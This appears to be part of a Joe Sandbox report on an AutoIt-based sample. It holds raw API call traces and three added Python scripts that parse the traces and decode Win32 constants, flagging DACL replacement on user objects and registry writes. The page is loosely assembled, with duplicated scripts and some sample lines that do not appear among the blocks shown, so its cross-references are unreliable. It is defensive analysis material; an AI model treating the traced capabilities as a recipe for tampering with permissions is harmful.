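"""Parse Joe Sandbox 'APIs' listing lines and decode well-known Win32 constants.

Added example for this page; not Joe Sandbox code and not code from the sample.
Constants come from the Windows SDK headers; the sample lines below are copied
from the listing on this page (constructed input, not a live report fetch).
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# One bullet of an 'APIs' block.  Argument lists are the disassembler's
# best-effort view of the stack at the call site: '?' is unresolved, and a
# parameterless call (GetProcessHeap) may show the *next* call's pushes, so
# argument positions are only trusted for the APIs listed in DECODE.
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# (api, zero-based argument index) -> {numeric value: symbolic name}
DECODE = {
    ("SendMessageW", 1): {0x1004: "LVM_GETITEMCOUNT", 0x102C: "LVM_GETITEMSTATE",
                          0x1032: "LVM_GETSELECTEDCOUNT", 0x0030: "WM_SETFONT"},
    ("SystemParametersInfoW", 0): {0x0030: "SPI_GETWORKAREA"},
    ("GetSystemMetrics", 0): {4: "SM_CYCAPTION", 7: "SM_CXFIXEDFRAME", 8: "SM_CYFIXEDFRAME"},
    ("GetStockObject", 0): {17: "DEFAULT_GUI_FONT"},
    ("GetUserObjectSecurity", 1): {4: "DACL_SECURITY_INFORMATION"},
    ("SetUserObjectSecurity", 1): {4: "DACL_SECURITY_INFORMATION"},
    ("GetAclInformation", 3): {2: "AclSizeInformation"},
    ("AddAce", 1): {2: "ACL_REVISION"},
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                      # raw tokens, e.g. '0000102C', '?', 'AutoIt v3 GUI'
    ref: str                        # address of the call site
    subcall: Optional[str] = None   # set for 'Part of subcall function X' lines
    decoded: dict = field(default_factory=dict)  # arg index -> symbolic name


def _to_int(tok: str) -> Optional[int]:
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None


def decode_args(api: str, args: list) -> dict:
    out = {}
    for i, tok in enumerate(args):
        v = _to_int(tok)
        if v is not None and (name := DECODE.get((api, i), {}).get(v)):
            out[i] = name
    # An LVIS_* mask in lParam only makes sense for LVM_GETITEMSTATE.
    if api == "SendMessageW" and out.get(1) == "LVM_GETITEMSTATE" \
            and len(args) > 3 and _to_int(args[3]) == 0x0002:
        out[3] = "LVIS_SELECTED"
    return out


def parse_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if not m:
        return None                 # headers such as 'APIs' or 'Strings'
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"),
                   m.group("sub"), decode_args(m.group("api"), args))


def parse_block(text: str) -> list:
    return [c for c in map(parse_line, text.splitlines()) if c is not None]


def render(call: ApiCall) -> str:
    args = ", ".join(call.decoded.get(i, tok) for i, tok in enumerate(call.args))
    via = f"[via {call.subcall}] " if call.subcall else ""
    return f"{via}{call.api}({args}) @ {call.ref}"


def classify(calls: list) -> set:
    """Heuristic tags (example's own, not a Joe Sandbox signature)."""
    apis = {c.api for c in calls}
    names = {n for c in calls for n in c.decoded.values()}
    tags = set()
    if any(n.startswith("LVM_") for n in names):
        tags.add("listview-control-helper")
    if "CreateWindowExW" in apis and any("AutoIt v3 GUI" in c.args for c in calls):
        tags.add("autoit-gui-window")
    if {"GetUserObjectSecurity", "AddAce", "SetUserObjectSecurity"} <= apis:
        tags.add("user-object-dacl-modification")
    return tags


# Constructed input: lines copied from the three function listings on this page.
SAMPLE_LISTVIEW = """APIs
• CharUpperBuffW.USER32(?,?), ref: 00B70D81
• _wcslen.LIBCMT ref: 00B70DBB
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B70F61
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B70FA0
  • Part of subcall function 00B42B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B42BA5
"""
SAMPLE_GUI = """• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AE25F8
• GetSystemMetrics.USER32(00000007), ref: 00AE2600
• GetSystemMetrics.USER32(00000004), ref: 00AE2658
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AE26B8
• GetStockObject.GDI32(00000011), ref: 00AE2706
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE2711
"""
SAMPLE_DACL = """  • Part of subcall function 00B41A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B41A60
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B41741
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B41775
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B417E2
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B41881
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B41893
"""

if __name__ == "__main__":
    for sample in (SAMPLE_LISTVIEW, SAMPLE_GUI, SAMPLE_DACL):
        calls = parse_block(sample)
        for c in calls:
            print(render(c))
        print("tags:", sorted(classify(calls)), "\n")
```

`render` keeps unresolved `?` tokens and undecoded hex as-is, so a line like `SendMessageW(?, LVM_GETITEMSTATE, 00000000, LVIS_SELECTED) @ 00B70FA0` still shows which arguments the disassembler could not recover. Extend `DECODE` with further (api, index) entries rather than decoding by value alone: the same number means different things in different argument slots.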
APIs
  • Part of subcall function 00B41A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B41A60
  • Part of subcall function 00B41A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A6C
  • Part of subcall function 00B41A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A7B
  • Part of subcall function 00B41A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A82
  • Part of subcall function 00B41A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B41A99
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B41741
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B41775
• GetLengthSid.ADVAPI32(?), ref: 00B4178C
• GetAce.ADVAPI32(?,00000000,?), ref: 00B417C6
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B417E2
• GetLengthSid.ADVAPI32(?), ref: 00B417F9
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B41801
• HeapAlloc.KERNEL32(00000000), ref: 00B41808
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B41829
• CopySid.ADVAPI32(00000000), ref: 00B41830
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B4185F
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B41881
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B41893
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B418BA
• HeapFree.KERNEL32(00000000), ref: 00B418C1
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B418CA
• HeapFree.KERNEL32(00000000), ref: 00B418D1
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B418DA
• HeapFree.KERNEL32(00000000), ref: 00B418E1
• GetProcessHeap.KERNEL32(00000000,?), ref: 00B418ED
• HeapFree.KERNEL32(00000000), ref: 00B418F4
  • Part of subcall function 00B41ADF: GetProcessHeap.KERNEL32(00000008,00B414FD,?,00000000,?,00B414FD,?), ref: 00B41AED
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B414FD,?), ref: 00B41AF4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B414FD,?), ref: 00B41B03
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 0a214e2abc302a1daea9da441b59203a8c4d2d0a6e9c018cc85bf0d5484b2d5f
                                                                                                                                                                                                                                                                                    • Instruction ID: 46a941122bbbedfe97b987142cc16f242437e5e627506e36190593c2b37498f7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a214e2abc302a1daea9da441b59203a8c4d2d0a6e9c018cc85bf0d5484b2d5f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B714AB2D00209ABDF10DFA9DC44FAEBBB9FF04390F144665E919A7190DB319A85DB60
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B6CF1D
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00B7DCD0,00000000,?,00000000,?,?), ref: 00B6CFA4
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00B6D004
• _wcslen.LIBCMT ref: 00B6D054
• _wcslen.LIBCMT ref: 00B6D0CF
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00B6D112
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00B6D221
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00B6D2AD
• RegCloseKey.ADVAPI32(?), ref: 00B6D2E1
• RegCloseKey.ADVAPI32(00000000), ref: 00B6D2EE
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00B6D3C0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Value$Close$_wcslen$ConnectCreateRegistry
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 9721498-966354055
• Opcode ID: 7cbd70df40e574f6662d9713a4f207a304cf1a1df0ec8b5d806ef9341752199f
• Instruction ID: 46e8a9a5fddd1bb6efef745acb8a40ed39497bbc61ccf47c0b15cc3295dfd3c8
• Opcode Fuzzy Hash: 7cbd70df40e574f6662d9713a4f207a304cf1a1df0ec8b5d806ef9341752199f
• Instruction Fuzzy Hash: 32127975A042419FCB14DF15C991A2ABBF5FF88714F04889CF98A9B3A2CB35ED45CB81
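The two function blocks above are raw API traces, and the constant arguments in them are only meaningful once decoded: the fourth parameter of RegSetValueExW is the REG_* value type (00000001 = REG_SZ, 00000007 = REG_MULTI_SZ, 0000000B = REG_QWORD with cbData 8, 00000003 = REG_BINARY, which matches the REG_* string table the block carries), the second parameter of SetUserObjectSecurity is a SECURITY_INFORMATION bitmask (00000004 = DACL_SECURITY_INFORMATION, i.e. the function replaces the DACL of a window station or desktop), and AddAce's second parameter 00000002 is ACL_REVISION. The script below is an added triage helper written for this page, not part of the Joe Sandbox report or of the sample: it parses lines in the report's "APIs" format (including the "Part of subcall function" variant and the paren-less `_wcslen.LIBCMT ref:` form) and annotates calls whose constants are documented Win32 values. The embedded input is copied from the two blocks above; `?` is the sandbox's marker for an argument it could not resolve statically. One caveat a reader should keep in mind: these traces show that the code contains the capability, not that this run exercised it, so the decoded registry types should be correlated with the behaviour and registry sections of the report rather than read as observed writes.

```python
"""Parse Joe Sandbox 'APIs' trace lines and decode security-relevant
constant arguments.  Added example for this page; not sandbox output."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One trace line, e.g.
#   • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00B6D221
#   • Part of subcall function 00B41ADF: HeapAlloc.KERNEL32(00000000,?), ref: 00B41AF4
#   • _wcslen.LIBCMT ref: 00B6D054            (no argument list at all)
_API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Documented Win32 constants (winnt.h / winuser.h).
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD",
             7: "REG_MULTI_SZ", 11: "REG_QWORD"}
SECURITY_INFORMATION = {0x1: "OWNER_SECURITY_INFORMATION", 0x2: "GROUP_SECURITY_INFORMATION",
                        0x4: "DACL_SECURITY_INFORMATION", 0x8: "SACL_SECURITY_INFORMATION"}
ACL_REVISION = 2


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # raw hex strings; '?' = unresolved by the sandbox
    ref: str                   # address of the call site
    subcall_of: Optional[str]  # function address when listed as "Part of subcall"


def parse_api_block(text: str) -> List[ApiCall]:
    """Return every trace line in `text` that matches the report's API format;
    headings, hash lines and dump-source lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _API_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
        calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return calls


def _hex_arg(args: List[str], index: int) -> Optional[int]:
    """Integer value of args[index], or None if absent or unresolved ('?')."""
    if index >= len(args) or args[index] == "?":
        return None
    return int(args[index], 16)


def decode(call: ApiCall) -> Optional[str]:
    """Human-readable note for calls whose constant arguments say what is done."""
    if call.api == "RegSetValueExW":
        t = _hex_arg(call.args, 3)               # dwType is the 4th parameter
        if t is not None:
            return f"writes value of type {REG_TYPES.get(t, f'0x{t:X}')}"
    elif call.api == "SetUserObjectSecurity":
        si = _hex_arg(call.args, 1)              # SECURITY_INFORMATION bitmask
        if si is not None:
            names = [n for bit, n in SECURITY_INFORMATION.items() if si & bit]
            return "replaces " + "|".join(names) + " on a user object (window station/desktop)"
    elif call.api == "AddAce" and _hex_arg(call.args, 1) == ACL_REVISION:
        return "appends ACE(s) to an ACL_REVISION ACL"
    return None


def registry_value_types(calls: List[ApiCall]) -> List[str]:
    """REG_* type names written by RegSetValueExW, in call-site order."""
    return [REG_TYPES.get(t, f"0x{t:X}") for c in calls if c.api == "RegSetValueExW"
            for t in [_hex_arg(c.args, 3)] if t is not None]


# Constructed input: lines copied from the two function blocks on this page.
SAMPLE = """APIs
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B4185F
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B41881
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B41893
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B418BA
• HeapFree.KERNEL32(00000000), ref: 00B418C1
  • Part of subcall function 00B41ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B414FD,?), ref: 00B41B03
Memory Dump Source
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B6CF1D
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00B7DCD0,00000000,?,00000000,?,?), ref: 00B6CFA4
• _wcslen.LIBCMT ref: 00B6D054
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00B6D112
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00B6D221
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00B6D2AD
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00B6D3C0
• RegCloseKey.ADVAPI32(00000000), ref: 00B6D2EE
"""

if __name__ == "__main__":
    for c in parse_api_block(SAMPLE):
        note = decode(c)
        tag = f" (in subcall {c.subcall_of})" if c.subcall_of else ""
        print(f"{c.ref}  {c.api}.{c.module}{tag}" + (f"  -> {note}" if note else ""))
```

Running it lists the fourteen calls with their call-site addresses and flags the DACL replacement and the four registry writes (REG_SZ, REG_MULTI_SZ, REG_QWORD, REG_BINARY). The same parser can be pointed at any other "APIs" block in the report; extend `decode` with further constant tables (for example the SECURITY_INFORMATION bits already cover SACL changes) rather than pattern-matching on API names alone.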
APIs
• CharUpperBuffW.USER32(?,?), ref: 00B71462
• _wcslen.LIBCMT ref: 00B7149D
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B714F0
• _wcslen.LIBCMT ref: 00B71526
• _wcslen.LIBCMT ref: 00B715A2
• _wcslen.LIBCMT ref: 00B7161D
  • Part of subcall function 00AFFD52: _wcslen.LIBCMT ref: 00AFFD5D
  • Part of subcall function 00B43535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B43547
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 1103490817-4258414348
• Opcode ID: 43af1d0bc654a05e0acb2ff4cb3d12df6f9f46ea4af6ea85b1b1be0c94d06317
• Instruction ID: 6cf663e3aed73135380025098363b4dde1b26ff7088f8aab460ee5fa6019aa40
• Opcode Fuzzy Hash: 43af1d0bc654a05e0acb2ff4cb3d12df6f9f46ea4af6ea85b1b1be0c94d06317
• Instruction Fuzzy Hash: C7E18E726083418FC714DF2DC59086AB7E2FF94714B14899CF8AA9B7A1DB30ED45CBA1
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 1256254125-909552448
• Opcode ID: d4d47f740ebfaffe765c50e2d49a75018702c64a6b49c090f9aae6710e9d4069
• Instruction ID: ec7dd8b2f330dc4d2182835263e6af1d66928cfd7fffe91c5b433098b96dab10
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4d47f740ebfaffe765c50e2d49a75018702c64a6b49c090f9aae6710e9d4069
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3371DF72F0016A8BCB209E7CCE505BB33E1EF71758B2501A8FC569B694EB39DD4487A0
APIs
• _wcslen.LIBCMT ref: 00B78DB5
• _wcslen.LIBCMT ref: 00B78DC9
• _wcslen.LIBCMT ref: 00B78DEC
• _wcslen.LIBCMT ref: 00B78E0F
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B78E4D
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B76691), ref: 00B78EA9
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B78EE2
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B78F25
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B78F5C
• FreeLibrary.KERNEL32(?), ref: 00B78F68
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B78F78
• DestroyIcon.USER32(?,?,?,?,?,00B76691), ref: 00B78F87
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B78FA4
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B78FB0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
• String ID: .dll$.exe$.icl
• API String ID: 799131459-1154884017
• Opcode ID: bc9c5a8f67058547acd0de3b8bb7369dbe8338da1af9e49834ea04222701594c
• Instruction ID: 9c9162dcedf5f5e7219e81e806aa1c5db70988ea28b0a3d04b2fea420ef4956c
• Opcode Fuzzy Hash: bc9c5a8f67058547acd0de3b8bb7369dbe8338da1af9e49834ea04222701594c
• Instruction Fuzzy Hash: 5661CF71940215BAEB14DF64CC49BBE7BA8EF08B10F108556F929EA1D1DF74A990CBA0
APIs
• CharLowerBuffW.USER32(?,?), ref: 00B5493D
• _wcslen.LIBCMT ref: 00B54948
• _wcslen.LIBCMT ref: 00B5499F
• _wcslen.LIBCMT ref: 00B549DD
• GetDriveTypeW.KERNEL32(?), ref: 00B54A1B
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B54A63
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B54A9E
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B54ACC
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: SendString_wcslen$BuffCharDriveLowerType
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 1839972693-4113822522
• Opcode ID: 766ab7cabe24ba724c4a10a589cfdded90ae15732c5c6e575b0613ed8dce06e5
• Instruction ID: 32eaaa624ebe2501f5a4db4bf2408eaec6f998b30a64a4afa4fd4b129d946969
• Opcode Fuzzy Hash: 766ab7cabe24ba724c4a10a589cfdded90ae15732c5c6e575b0613ed8dce06e5
• Instruction Fuzzy Hash: BA7102326082019FC710EF34C981A6BB7E4EF95768F0049ADF89697261EB31DD89CB91
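The "APIs" records in this report list every call site as API.MODULE(args), ref: VA, and the "Source File" line of each record carries the module base the dump was taken at (Offset: 00AE0000, based on PE: true). When the same code is opened from the unpacked PE in a disassembler it will usually sit at a different base, so the raw VAs do not line up. The following is an added example, not code from Joe Sandbox or from this report: a Python parser that turns these records into structured call-site entries, converts each VA into an RVA relative to the record's own base, and collects the distinct imports per DLL. SAMPLE is a constructed excerpt made of lines copied from the records above; the on-disk base passed to ida_rebase_hint is an assumed value chosen for illustration.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: lines copied from the "APIs" / "Memory Dump Source"
# records of this report, in the layout Joe Sandbox prints them.
SAMPLE = """\
APIs
• _wcslen.LIBCMT ref: 00B78DB5
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B78E4D
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B76691), ref: 00B78EA9
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B78F78
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B78FA4
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
APIs
• GetDriveTypeW.KERNEL32(?), ref: 00B54A1B
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B54A63
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
"""

# One call-site line: optional bullet, API.MODULE, optional "(args)", "ref: <hex VA>".
API_LINE = re.compile(
    r"^[•*-]?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# The "Source File" line closes a record and gives the base the VAs are relative to.
BASE_LINE = re.compile(r"Source File:.*?Offset:\s*(?P<base>[0-9A-Fa-f]+)")


@dataclass
class ApiRef:
    api: str
    module: str
    args: list            # raw argument tokens as printed ("?" = not resolved by the sandbox)
    va: int               # call-site virtual address as seen in the dump
    rva: Optional[int] = None  # va - record base, filled in once the base is known


@dataclass
class ApiBlock:
    refs: list = field(default_factory=list)
    base: Optional[int] = None


def parse_api_blocks(text: str) -> list:
    """Split report text into APIs records and resolve each call-site VA to an RVA."""
    blocks = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = ApiBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            current.refs.append(ApiRef(m["api"], m["module"], args, int(m["ref"], 16)))
            continue
        m = BASE_LINE.search(line)
        if m:
            current.base = int(m["base"], 16)
            for r in current.refs:
                r.rva = r.va - current.base
            current = None  # record is complete
    return blocks


def imports_by_module(blocks: list) -> dict:
    """Distinct APIs used per DLL across all parsed records (a quick import-set fingerprint)."""
    out = {}
    for b in blocks:
        for r in b.refs:
            out.setdefault(r.module, set()).add(r.api)
    return out


def ida_rebase_hint(block: ApiBlock, on_disk_base: int) -> dict:
    """Map 'API@VA' to the address the call site would have with the PE loaded at on_disk_base."""
    return {f"{r.api}@{r.va:08X}": on_disk_base + r.rva for r in block.refs if r.rva is not None}


if __name__ == "__main__":
    for b in parse_api_blocks(SAMPLE):
        for r in b.refs:
            print(f"{r.module:>8}!{r.api:<16} VA={r.va:08X} RVA={r.rva:06X} args={r.args}")
```

The RVAs are relative to the base printed on the "Source File" line of the same record, so records taken from different dumps (different Offset values) are rebased independently; the rebase hint assumes the on-disk image has the same section layout as the dumped one, which holds for a plain memory dump of a loaded PE but not for a region that was unpacked into freshly allocated memory.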
APIs
